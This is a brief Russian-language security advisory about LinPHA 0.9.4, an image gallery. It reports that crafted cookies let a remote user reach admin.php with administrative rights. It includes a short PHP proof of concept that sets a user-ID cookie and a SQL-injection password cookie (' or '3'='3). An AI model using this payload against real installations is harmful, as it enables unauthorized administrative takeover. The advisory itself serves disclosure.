Программа: LinPHA 0.9.4
Уязвимость в LinPHA галереи изображений позволяет удаленному пользователю получить административный доступ к приложению.
Удаленный пользователь может установить специально обработанные значения куки и затем обратится к 'admin.php' сценарию, чтобы успешно аутентифицироваться в приложении.
Пример:
<?PHP
setcookie("linpha_userid","1",time()+86400*365,'/linpha');
setcookie("linpha_password","' or '3'='3",time()+86400*365,'/linpha');
?>
